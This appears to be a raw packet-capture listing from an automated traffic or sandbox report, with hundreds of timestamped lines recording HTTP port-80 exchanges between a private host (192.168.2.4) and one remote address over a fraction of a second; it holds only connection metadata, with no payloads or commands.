Dec 27, 2023 18:12:24.631757021 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.631767035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.631778955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.631789923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.631798983 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.631819010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.631844044 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.632493973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.632505894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.632536888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.632540941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.632554054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.632556915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.632565975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.632580042 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.632601976 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.635843992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.635858059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.635896921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.635978937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.635992050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.636015892 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.636048079 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.637507915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.637521029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.637531996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.637545109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.637551069 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.637557030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.637568951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.637576103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.637582064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.637598038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.637604952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.637624025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.637641907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.638034105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.638065100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.638077021 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.638079882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.638106108 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.638119936 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.638125896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.638164043 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.639051914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.639075041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.639086962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.639096022 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.639112949 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.639133930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.639134884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.639180899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.652484894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.652533054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.652575970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.652777910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.652817965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.652832985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.652844906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.652856112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.652868032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.652885914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.652904034 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.661283016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.661323071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.661325932 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.661334991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.661348104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.661365032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.661385059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.661402941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.661416054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.661441088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.661467075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.661542892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.661596060 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.661601067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.661648035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.661813021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.661849022 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.661870003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.662132978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.662144899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.662269115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.662281036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.662292957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.662305117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.662316084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.662482023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.662888050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.663054943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.663091898 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.663122892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.663135052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.663146973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.663157940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.663170099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.663170099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.663182020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.663194895 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.663245916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.663995981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.664061069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.664134979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.664145947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.664158106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.664169073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.664170027 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.664180994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.664208889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.664962053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.664973974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.664985895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.664997101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.665009022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.665011883 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.665020943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.665033102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.665047884 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.665066004 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.665860891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.665968895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.665980101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.665992022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.666002989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.666017056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.666018963 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.666029930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.666038990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.666054964 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.666829109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.666841984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.666853905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.666879892 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.666902065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.666909933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.666913986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.666927099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.666939020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.666964054 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.666975975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.667781115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.667793989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.667823076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.667841911 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.667864084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.667876005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.667889118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.667921066 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.667944908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.667988062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.668689966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.668701887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.668718100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.668735981 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.668739080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.668782949 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.668804884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.668817997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.668828964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.668844938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.668868065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.669586897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.669775963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.669786930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.669797897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.669814110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.669821978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.669826984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.669838905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.669850111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.669852972 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.669864893 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.669895887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.670608997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.670644999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.670660973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.670675039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.670701981 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.670717955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.670725107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.670732021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.670753956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.670768023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.671583891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.671597958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.671639919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.671649933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.671662092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.671673059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.671684027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.671686888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.671696901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.671715975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.671739101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.672602892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.672615051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.672626972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.672638893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.672651052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.672662020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.672672987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.672678947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.672703028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.673465014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.673476934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.673486948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.673499107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.673510075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.673521042 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.673521042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.673533916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.673549891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.673574924 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.674396038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.674408913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.674421072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.674442053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.674455881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.674468040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.674479961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.674490929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.674495935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.674518108 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.675218105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.675260067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.675270081 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.675271988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.675283909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.675293922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.675316095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.675317049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.675339937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.675347090 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.675381899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.676131010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.676271915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.676348925 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.676429987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.676516056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.676528931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.676539898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.676552057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.676563025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.676578999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.676605940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.677181959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.677248955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.677262068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.677273989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.677299023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.677316904 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.683624029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.683636904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.683689117 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.683871031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.683883905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.683895111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.683907032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.683918953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.683931112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.683943033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.683954000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.683990002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.684778929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.684792042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.684804916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.684842110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.684866905 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.685194969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.685240030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.685252905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.685286999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.685291052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.685300112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.685334921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.687619925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.687632084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.687643051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.687680006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.687681913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.687693119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.687701941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.687731028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.687956095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.687968016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.688007116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.688216925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.688236952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.688249111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.688273907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.688281059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.688327074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.690953970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.690967083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.691040039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.691092014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.691104889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.691117048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.691128016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.691145897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.691155910 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.691165924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.691178083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.691190004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.691230059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.692029953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.692043066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.692081928 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.692224026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.692235947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.692248106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.692260981 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.692287922 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.692293882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.692750931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.692823887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.692836046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.692847967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.692867041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.692897081 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.692955017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.692990065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.694705009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.694719076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.694729090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.694753885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.694757938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.694786072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.694894075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.694906950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.694951057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.694963932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.694977045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.694987059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.694999933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.695014000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.695040941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.701596022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.701608896 CET	80	49738	5.42.65.125	192.168.2.4
